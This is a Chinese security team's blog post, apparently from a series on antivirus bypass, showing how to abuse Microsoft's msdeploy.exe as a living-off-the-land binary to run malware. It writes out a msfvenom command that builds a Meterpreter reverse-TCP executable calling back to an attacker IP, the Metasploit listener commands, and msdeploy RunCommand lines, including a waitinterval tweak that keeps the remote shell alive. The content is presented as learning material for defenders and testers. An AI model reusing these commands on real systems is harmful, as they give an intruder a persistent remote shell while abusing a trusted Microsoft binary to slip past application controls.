声明:Tide安全团队原创文章,转载请声明出处!文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
文章打包下载及相关软件下载:https://github.com/TideSec/BypassAntiVirus
msdeploy.exe是微软提供的web部署命令行工具,通过它可以方便的部署web应用、数据库等,路径在C:\Program Files\IIS\Microsoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或远程同步,打包和部署Web应用程序,网站或Web服务器内容和配置。它具有众多功能,这些功能可以高度精确地包括要处理的那些组件,并排除那些不需要的组件。为了能够使用Web Deploy,必须已在源计算机和目标计算机上安装IIS。
msdeloy的命令参数繁杂,想要通过msdelopy来执行payload我们需要了解以下的几个参数:
-verb:<verbName>:指定Web Deploy动作即需要对源对象或目标对象执行的操作。<verbName>必须为以下之一:delete,dump,getDependencies,getSystemInfo或sync。sync即synchronize(同步操作),需要指定源对象和目标对象。
-source:<provider>:指定动作参数的数据源。source是同步和转储操作的必需参数,但不是delete操作的必备参数。可以使用msdeploy.exe -source -help命令查看关于source参数帮助,其中有一RunCommand参数可以在调用同步时在目标运行命令。
-dest: <provider>:指定sync/delete操作的目的地。仅当指定了sync或delete动词时,-dest参数才是必需的。-dest参数所使用的<provider>程序、其路径和设置是与-source参数是一致的。
通过执行.exe文件执行payload,生成.exe木马文件的方式有很多种在实战中可以选择免杀效果较好的。为了方便演示直接使用msf生成的木马文件:
msfvenom -f exe -p windows/meterpreter/reverse_tcp lhost=192.168.19.146 lport=23333 > w_re.exe
msf监听:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.19.146
set lport 23333
exploit
复制文件到本地使用msdeploy执行:
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe"
不添加执行重试间隔时间的情况下,该进程建立之后会中断重试,得到会话存活时间很短。
使用waitinterval参数指定较长的程序重试时间间隔,以得到稳定会话。
msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe",waitinterval=15000000
开启火绒和360的情况下会报警并清除木马文件:
使用virustotal.com检查:由于使用msfvenom原生木马,查杀率相当感人:
lolbas-msdploy:https://lolbas-project.github.io/lolbas/OtherMSBinaries/Msdeploy/#awl%20bypass
微软mesdploy文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
msdeploy-runcommand参数文档:https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee619740%28v%3dws.10%29
E
N
D
guān
关
zhù
注
wǒ
我
men
们
Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。
对安全感兴趣的小伙伴可以关注团队官网: http://www.TideSec.com 或长按二维码关注公众号: